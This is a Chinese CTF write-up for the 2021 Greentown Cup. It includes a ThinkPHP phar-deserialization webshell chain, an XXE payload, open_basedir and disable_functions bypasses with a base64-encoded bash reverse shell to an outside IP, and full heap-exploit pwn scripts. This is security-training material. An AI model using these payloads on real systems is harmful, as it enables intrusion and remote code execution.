2021 绿城杯 wp
2024-05-04 16:03:15
2021 绿城杯 wp
- Web
- ezcms
- ezphp
- Misc
- [warmup]⾳频隐写
- Re
- easyre
- Crypto
- RSA1
- [warmup]加密算法
- Pwn
- null_pwn
- uaf
- GreentownNote
- Tip
Web
ezcms
ciscn华东北分区赛awd的链⼦
<?php
namespace think\cache\driver {class File{protected $options=null;protected $tag;function __construct(){$this->options=['expire' => 3600,'cache_subdir' => false,'prefix' => '','path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-
decode/resource=aaaPD9waHAgQGV2YWwoJF9SRVFVRVNUWydzdWFudmUnXSk7Pz4g/../uploads/user/4/allimg/20
210929/a.php','data_compress' => false,];$this->tag = 'suanve';}}
}
namespace think\session\driver{class SessionHandler{}class Memcached extends SessionHandler{protected $handler;protected $config = [];function __construct()
{$this->config['session_name'] = 123;$this->config['expire'] = 123;
$this->handler = new \think\cache\driver\File();}}
}
namespace think\console{class Output{protected $styles;private $handle;function __construct()
{$this->styles = array('readAndWrite');$this->handle = new \think\session\driver\Memcached();}}
}
namespace think {class Process{private $processInformation;private $status;private $process;private $processPipes;function __construct()
{$this->status = 'started';$this->processInformation= array("running"=>true);$this->processPipes = new console\Output();$this->process = 1;}}
}
namespace {use think\Process;// echo base64_encode(serialize(new Process()));@unlink("phar.phar");$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');$o = new Process();$phar->setMetadata($o); //将⾃定义的meta-data存⼊manifest$phar->addFromString("test.txt", "test"); //添加要压缩的⽂件//签名⾃动计算$phar->stopBuffering();copy("./phar.phar","/Users/su/1.gif");
}
⽣成phar⽂件 eyoucms不校验ico后缀的⽂件 所以改名为ico⽂件即可上传,xxe触发phar 通过gitee发现了⼀个xxe的修复 应该可以利⽤。
POST /index.php/home/Index/_initialize HTTP/1.1
Host: 0666787d-4b66-4e6e-8d13-55ab438b085f.zzctf.dasctf.com
Content-Type: text/xml; charset=utf-8
Cache-Control: max-age=0
Content-Length: 265
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-
encode/resource=phar:///var/www/html/uploads/user/4/allimg/20210929/4-210929141155239.ico" >]>
<root>
<name>&xxe;</name>
</root>
拿到shell发现限制
绕过openbasedir
然后使⽤dl绕过disable_function 反弹shell
<?php
ini_set('open_basedir',dirname(__FILE__));
mkdir('tmp');
chdir('tmp');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
ini_set('open_basedir','/');
echo "fuck runing";
$cmd = '/readflag';
$cmd = "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE2NS4xMTUvOTAxIDA+JjE=|base64 -d |bash";
$out_path = "/tmp/xxx";
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = "/tmp/exp.so";
putenv("LD_PRELOAD=" . $so_path);
mb_send_mail("", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
//var_dump(file_get_contents("/"));
使⽤PATH提权
ezphp
githack获取源码
FLAG DASCTF{ca9efc658d3d96d7f2ccc81733bb4830}
Misc
[warmup]⾳频隐写
使⽤audacity打开题⽬,转换成频谱图,拉到最后即可看到flag。
Re
easyre
32位exe⽂件,打开之后是魔改的rc4
直接写脚本不好做,可以⽤爆破来爆破每⼀位,python的os库可以调⽤exe
import os
b=['Hello, this is my world.If you want flag, give me something I like.\n', '\n', '\n', '\n',
"sorry!I don't like your stuff."]
flag=""
c=""
for i in range(50):for j in range(32,127):flag=cflag+=chr(j)with open("tt.txt", "w") as f:f.write(flag)os.system("easy_re.exe <tt.txt> flag.txt")with open("flag.txt", "r") as a:data = a.readlines()#print(data)if(data!=b):print(chr(j))c+=chr(j)break
FLAG flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}
Crypto
RSA1
[warmup]加密算法
加密算法是读到字⺟的下标,然后按照 (下标*a+b)%m 的计算⽅式,计算出新的下标,来表示新的字符串。只需要 写⼀个逆操作就好。
from Crypto.Util.number import *
cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def decode(plain_text, a, b, m):flag = ''for j in plain_text:for i in range(len(str1)):if (i*a+b) % m == str1.find(j):flag += str1[i]if j not in str1:flag += jprint(flag)
decode(cipher_text,37,23,52)
# flag{AffInE_CIpheR_iS_clAssiC}
Pwn
null_pwn
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./null_pwn'
#context.arch='amd64'
while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16'''
if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=remote('82.157.5.28',51704)clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('Your choice :',str(a))def add(a,c,b):choice(1)io.sendlineafter('Index:',str(a))io.sendlineafter('Size of Heap : ',str(c))io.sendafter('Content?:',b)def edit(a,b):choice(3)io.sendlineafter('Index:',str(a))io.sendafter('Content?:',b)def show(a):choice(4)io.sendlineafter('Index :',str(a))def delete(a):choice(2)io.sendlineafter('Index:',str(a))add(0,0x88,'a')add(1,0x68,'a')add(2,0x68,'a')add(3,0x88,'a')add(4,0xf0,'a')add(5,0xf0,'a')delete(0)show(0)edit(3,'\x00'*0x80+p64(0x200)+'\x00')delete(4)delete(1)add(0,0xc8,'a'*8)
show(0)libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-840-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/sh\x00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']edit(0,'\x00'*0x88+p64(0x71)+p64(libc.sym['__malloc_hook']-0x23)+'\n')add(1,0x68,'a')add(3,0x68,'a')edit(3,'\x00'*0x13+p64(libc_base+one_gadgaet[2])+'\n')edit(0,'\x00'*0x88+p64(0x1000)+p64(libc.sym['__malloc_hook']-0x23)+'\n')delete(1)success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
uaf
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./uaf_pwn'
#context.arch='amd64'
while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=remote('82.157.5.28',50202)clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('>',str(a))def add(c):choice(1)io.sendafter('size>',str(c))def edit(a,b):choice(3)io.sendlineafter('index>',str(a))io.sendafter('content>',b)def show(a):choice(4)io.sendlineafter('index>',str(a))def delete(a):choice(2)io.sendlineafter('index>',str(a))io.recvuntil('0x')heap_addr=int(io.recv(12),16)add(0x88)add(0x68)add(0x68)delete(0)show(0)libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/sh\x00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']delete(1)edit(1,p64(libc.sym['__malloc_hook']-0x23))
add(0x68)add(0x68)edit(4,'\x00'*0x13+p64(one_gadgaet[2]+libc_base))delete(1)delete(1)success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue
GreentownNote
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./GreentownNote'
#context.arch='amd64'
while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16'''
if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=process(elfelf)# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')io=remote('82.157.5.28',51701)clibc.srand(clibc.time(0))libc=ELF('./libc-2.27.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def choice(a):io.sendlineafter('Your choice :',str(a))def add(b,c):choice(1)io.sendlineafter(':',str(b))io.sendafter(':',str(c))def show(a):choice(2)io.sendlineafter(':',str(a))def delete(a):choice(3)io.sendlineafter(':',str(a))add(0x88,'a')add(0x88,'a')for i in range(7):delete(1)delete(0)show(0)libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-96-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/sh\x00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']add(0x88,p64(free_hook_addr))add(0x88,p64(free_hook_addr))new_shell_code_head_addr=free_hook_addr&0xfffffffffffff000
shell1='''xor rdi,rdimov rsi,%dmov rdx,0x1000xor rax,raxsyscalljmp rsi'''%new_shell_code_head_addrpay=p64(libc.sym['setcontext']+53)+p64(free_hook_addr+0x10)+asm(shell1)add(0x88,pay)srop_mprotect=SigreturnFrame()srop_mprotect.rsp=free_hook_addr+0x8srop_mprotect.rdi=new_shell_code_head_addrsrop_mprotect.rsi=0x1000srop_mprotect.rdx=4|2|1srop_mprotect.rip=libc.sym['mprotect']add(0x200,str(srop_mprotect))# gdb.attach(io,gdb_text)delete(3)shell2='''mov rax,0x67616c662f2epush raxmov rdi,rspmov rsi,0x0xor rdx,rdxmov rax,0x2syscallmov rdi,raxmov rsi,rspmov rdx,0x100mov rax,0x0syscallmov rdi,0x1mov rsi,rspmov rdx,0x100mov rax,0x1syscall'''io.sendline(asm(shell2))# success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))# gdb.attach(io,gdb_text)io.interactive()# except Exception as e:
# io.close()# continue# else:# continue
Tip
你是否想加入一个安全团
拥有更好的学习住宅?
那就加入EDI安全,一起来不是,但师傅们明白,可以让你从基础开始,只要你有恒努力的决心
EDI安全的CTF战队经常参与CTF比赛,了解CTF赛事,在为打造安全圈好的技术我们自己而努力,这里绝对是你学习的好技术。 ,可以让你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎大佬小白入驻,大家一起打CTF,一起进步。
我们在,不让你埋没!
你的加入可以给我们带来新的活力,我们同样也可以给予你无限的发展空间。
有意向的师傅请联系邮箱root@edisec.net带上自己的简历,简历内容包括自己的学习、学习方向等
2021 绿城杯 wp相关推荐
- [2021绿城杯] [Misc] 流量分析 + cobaltstrike 流量解密
[2021绿城杯] [Misc] 流量分析 + cobaltstrike 流量解密 2021年"绿城杯"网络安全大赛-Misc-流量分析 [2021绿城杯] [Misc] 流量分析 ...
- 2021 长城杯ctf wp
2021 长城杯 wp Misc 签到 你这flag保熟吗 Crypto baby_rsa Reverse Just_cmp funny_js Web java_url ez_python Pwn K ...
- [ctf misc][wp]一些内存取证的wp(含[2021蓝帽杯北部赛区分区赛]博人的文件)
wp 1.[V&N2020 公开赛]内存取证 1.找策略 volatility.exe -f C:\Users\shen\Downloads\mem.raw imageinfo 2.看进程 v ...
- 【pwn】2021 鹤壁杯 wp
[pwn]2021 鹤壁杯 wp 前言 这场比较简单,但是也看到了自己急于求成的下场,基础知识非常不牢固,很多调试手段都太拉了,逆向能力也是非常差,还是得跟着师傅们继续学啊! 1.ret2libc1 ...
- 2021羊城杯CTF wp
2021羊城杯(部分)wp Web web1 only 4 web2 EasyCurl web3 Checkin_Go web4 Cross The Side Re Pwn BabyRop Cryp ...
- 2021 [线下]陇剑杯 wp
2021 [线下]陇剑杯 wp 前言 1.1 1.2 1.3 1.4 1.5 3.1 3.3 4.1 4.2 5.1 5.2 Tip 前言 wp由EDI yanshu师傅投稿 ,感谢yanshu师傅. ...
- 2021天翼杯 密码官方wp
2021天翼杯 crypto TryHash 审计题目代码,题目给出了一个feistel结构的加密算法,密钥长度为8字节.用随机生成的密钥对flag进行了加密.攻击者可以提供一段明文让服务器用同样的密 ...
- 2021美亚杯(个人赛)练习记录
因为当时没有参加比赛,用的奇哥给的镜像和参考答案,然后自己重新做了一遍,记录一下自己的思路(我自封大娘级记录,保姆级懂吧). 指路奇哥(奇哥带好人 (๑•̀ㅂ•́)و✧):2021第七届美亚杯中国电子 ...
- 2021美亚杯个人赛记录
一.检材 1.案件背景 个人赛 2021年10月某日早上,本市一个名为"大路建设"的高速公路工地主管发现办公室的计算机被加密并无法开启,其后收到了勒索通知.考虑到高速公路的基建安全 ...
最新文章
- java 获取字符串长度_ava练习实例:java字符串长度与Java String charAt() 方法 (建议收藏)...
- angularJs跨域
- Kosaraju算法(发现强连通分图算法)
- 忙了一上午终于把形状特征搞定了啊
- php 汉字分割,php支持中文字符串分割的函数
- python 反射和动态加载_Python的反射
- BZOJ.1178.[APIO2009]会议中心(贪心 倍增)
- android 动态改变listview的内容
- Centos 7系统目录结构
- iOS关于通知传值Bool类型的注意点
- 【Python+Stata】豪斯曼检验:固定效应or随机效应?
- 北京文安科技发展有限公司招聘简介
- B站视频下载 bilibili 哔哩哔哩
- GA算法(遗传算法) ——以求解achley,rastrigin函数为例
- 局部搜索(爬山法+模拟退火+遗传算法)
- 运放选型、参数分析以及应用
- (初学者视角)二极管和三极管的工作原理
- jieba的简单使用
- javase哪部分最难_关于javase的一些个人理解
- EXECL打开密码暴力破解